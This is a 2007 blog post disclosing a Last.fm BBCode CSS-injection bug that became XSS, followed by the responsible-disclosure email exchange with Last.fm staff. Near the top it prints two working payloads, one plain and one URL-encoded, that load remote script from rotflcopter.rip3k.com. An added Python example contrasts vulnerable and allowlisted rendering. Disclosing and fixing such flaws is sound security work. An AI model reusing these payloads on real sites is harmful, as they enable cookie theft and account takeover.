Last.fm hack

Just before the summer holidays, last.fm was still vulnerable to the following attack (line breaks added only for readability):

[font=inherit;display:none;-moz-binding:
url('http://rotflcopter.rip3k.com/xssmoz.php#xss');][/font]
[font=inherit;background-image:url(javascript:
eval('%76%61%72%20%61%3D%64%6F%63%75%6D%65%6E%74
%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22
%73%63%72%69%70%74%22%29%3B%76%61%72%20%78%78%3D
%61%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%6F
%74%66%6C%63%6F%70%74%65%72%2E%72%69%70%33%6B%2E
%63%6F%6D%2F%6C%6F%6C%66%72%2E%70%68%70%22%3B%76
%61%72%20%79%3D%61%2E%74%79%70%65%3D%22%74%65%78
%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%76%61
%72%20%78%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D
%65%28%22%68%65%61%64%22%29%5B%30%5D%2E%61%70%70
%65%6E%64%43%68%69%6C%64%28%61%29%3B'));][/font]

The first line was prepared for Gecko-based browsers; the second worked on IE and Opera. It was a CSS injection vulnerability which, thanks to browser-specific bugs, could be turned into JavaScript injection. From there it is a short step to stealing cookies and, as a result, taking over the account.
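As an added illustration (not Last.fm's code), here is a minimal Python BBCode renderer with the parameter handling the report describes, beside an allowlisted version that drops anything outside a strict font-name or colour pattern; the sample input and its host name are constructed placeholders.

```python
import html
import re

# Added example, not Last.fm's code: the bug pattern described above, where the
# text after '=' in a [font=...] or [color=...] tag is read up to the first
# whitespace and copied straight into a <span style="..."> attribute, beside an
# allowlisted rewrite. Nested tags are deliberately not handled.
TAG_RE = re.compile(r"\[(font|color)=([^\s\]]+)\](.*?)\[/\1\]", re.S)

def _prop(tag: str) -> str:
    return "font-family" if tag == "font" else "color"

def render_unsafe(bbcode: str) -> str:
    """Vulnerable: any non-whitespace run becomes CSS, so ';' lets the author
    append arbitrary declarations (e.g. -moz-binding or a javascript: url)."""
    def sub(m):
        tag, param, body = m.groups()
        return f'<span style="{_prop(tag)}:{param}">{body}</span>'
    return TAG_RE.sub(sub, bbcode)

# Allowlists: a font name is letters/digits/hyphens; a colour is a hex
# triplet/sextet or a bare word. Neither admits ';', ':', '(' or quotes, so
# no second declaration, url() or attribute breakout can be smuggled in.
FONT_RE = re.compile(r"^[A-Za-z][A-Za-z0-9\-]{0,30}$")
COLOR_RE = re.compile(r"^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[A-Za-z]{1,20})$")

def valid_param(tag: str, param: str) -> bool:
    """True only if the parameter matches the allowlist for its tag."""
    return bool((FONT_RE if tag == "font" else COLOR_RE).match(param))

def render_safe(bbcode: str) -> str:
    """Hardened: reject parameters outside the allowlist (keeping the text,
    dropping the styling) and HTML-escape everything that reaches the output."""
    def sub(m):
        tag, param, body = m.groups()
        if not valid_param(tag, param):
            return html.escape(body)
        return (f'<span style="{_prop(tag)}:{html.escape(param, quote=True)}">'
                f'{html.escape(body)}</span>')
    return TAG_RE.sub(sub, bbcode)

# Constructed sample in the shape of the Gecko payload above (placeholder host).
EVIL_SAMPLE = "[font=inherit;display:none;-moz-binding:url(http://example.invalid/x)]hi[/font]"

if __name__ == "__main__":
    print(render_unsafe(EVIL_SAMPLE))  # the injected declarations survive
    print(render_safe(EVIL_SAMPLE))    # just "hi"
```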

Here is the exchange with support:

Bugs
11 messages


onetoseek@o2.pl <onetoseek@o2.pl> 28 June 2007 19:28
To: office@last.fm
I have one simple question:
Where can I submit security bugs? I guess doing it on a public forum
isn’t a good idea.

Russell Garrett <russ@last.fm> 28 June 2007 19:38
To: onetoseek@o2.pl
Cc: office@last.fm
Please reply to me and I can handle them.

Thanks,
Russ Garrett
russ@last.fm



onetoseek@o2.pl <onetoseek@o2.pl> 28 June 2007 20:45
To: Russell Garrett <russ@last.fm>
Hello,
I guess showing an example is the best way. Here’s my profile
http://www.last.fm/user/niteria/
Of course I’m not from Last.fm Staff and that Recent visitors panel
above the shoutbox isn’t a Last.fm feature. Now, if you entered my profile I
could’ve changed your password.
Ok, now more technical details:
You have bugs in some bbcode tags. As far as I remember it is the [font],
[color] and [align] tags. Those tags let you enter some special
parameters after ‘=’. As I noticed, nothing except reading the parameter
until the first whitespace character is done. The parameter is directly
copied into the span’s style tag. Now CSS injection can be done. The only
condition for malicious code is that it can’t have some meaningless
characters. Ok, CSS injection may seem not dangerous at all, but the most
used browsers (based on the Gecko engine or the Internet Explorer engine) have
specific flaws. Gecko accepts -moz-binding and IE simply
executes JavaScript if it is passed as an image. Connecting the
information we have, we can conclude that JavaScript injection can be
done. That’s what is shown on my profile. As far as I know those tags
are accepted in almost any place in Last.fm. The only exception is the
shoutbox. As you can see, that makes a great risk to all users.
Regards,
niteria.
2007/6/28, Russell Garrett <russ@last.fm>:



onetoseek@o2.pl <onetoseek@o2.pl> 3 July 2007 19:03
To: office@last.fm
Well, I feel like I’m being ignored. I sent a bug report to Russ, but I
didn’t get any reply.
It’s a serious bug and if you don’t fix it, somebody else can notice
it and make a bad use of it.
thanks in advance,
niteria.

Russell Garrett <russ@last.fm> 3 July 2007 19:06
To: onetoseek@o2.pl
Cc: office@last.fm
I’m sorry, I get a lot of e-mail, I may have deleted it by mistake.
Could you please send it again?

Thanks,
Russ Garrett
russ@last.fm
onetoseek@o2.pl wrote:



onetoseek@o2.pl <onetoseek@o2.pl> 3 July 2007 19:30
To: russ@last.fm


Please reply when you get this mail, otherwise I’ll keep spamming your mailbox.



Russell Garrett <russ@last.fm> 3 July 2007 19:32
To: onetoseek@o2.pl
Thanks, sorry for missing the e-mail the first time. I’ll respond
properly later.
Russ



Bartosz Nitka <niteria@gmail.com> 3 July 2007 19:53
To: office@last.fm
seems like mail sent to russ@last.fm didn’t arrive.

———- Forwarded message ———-
From: onetoseek@o2.pl <onetoseek@o2.pl>



Russell Garrett <russ@last.fm> 3 July 2007 20:20
To: onetoseek@o2.pl
Nice hack :) we’ve just fixed it now, and we’ve given you a year’s
subscription too.
Thanks again,

Russ
onetoseek@o2.pl wrote:



onetoseek@o2.pl <onetoseek@o2.pl> 3 July 2007 21:39
To: Russell Garrett <russ@last.fm>
Thanks for the subscription, but this bug was worked out by two people and
it would be not fair if only I get this subscription. My friend’s nick
is maszok. I hope you can do that for our being honest.

2007/7/3, Russell Garrett <russ@last.fm>:



Russ Garrett <russ@last.fm> 4 July 2007 03:02
To: onetoseek@o2.pl
Done :)

Russ
onetoseek@o2.pl wrote:
> Thanks for the subscription, but this bug was worked out by two people and
> it would be not fair if only I get this subscription. My friend’s nick
> is maszok. I hope you can do that for our being honest.
>
> 2007/7/3, Russell Garrett <russ@last.fm>:
>
> Nice hack :) we’ve just fixed it now, and we’ve given you a year’s
> subscription too.
>
> Thanks again,
>
> Russ
>
> onetoseek@o2.pl wrote:
> > ———- Forwarded message ———-
> > From: onetoseek@o2.pl <onetoseek@o2.pl>
> > Date: 28-06-2007 20:45
> > Subject: Re: Bugs
> > To: Russell Garrett <russ@last.fm>
> >
> >
> > Hello,
> > I guess showing an example is the best way. Here’s my profile
> > http://www.last.fm/user/niteria/
> > Of course I’m not from Last.fm Staff and that Recent visitors panel
> > above the shoutbox isn’t a Last.fm feature. Now, if you entered my
> > profile I could’ve changed your password.
> > Ok, now more technical details:
> > You have bugs in some bbcode tags. As far as I remember it is the
> > [font], [color] and [align] tags. Those tags let you enter some special
> > parameters after ‘=’. As I noticed, nothing except reading the parameter
> > until the first whitespace character is done. The parameter is directly
> > copied into the span’s style tag. Now CSS injection can be done. The only
> > condition for malicious code is that it can’t have some meaningless
> > characters. Ok, CSS injection may seem not dangerous at all, but the
> > most used browsers (based on the Gecko engine or the Internet Explorer
> > engine) have specific flaws. Gecko accepts -moz-binding and IE simply
> > executes JavaScript if it is passed as an image. Connecting the
> > information we have, we can conclude that JavaScript injection can be
> > done. That’s what is shown on my profile. As far as I know those tags
> > are accepted in almost any place in Last.fm. The only exception is the
> > shoutbox. As you can see, that makes a great risk to all users.
> > Regards,
> > niteria.
> > PS. Can a talented underage php/c++ programmer work for Last.fm?
> > Please reply when you get this mail, otherwise I’ll keep spamming
> > your mailbox.
> > 2007/6/28, Russell Garrett <russ@last.fm>:
> >> Please reply to me and I can handle them.
> >>
> >> Thanks,
> >>
> >> Russ Garrett
> >> russ@last.fm


~ - by niteria, September 7, 2007.
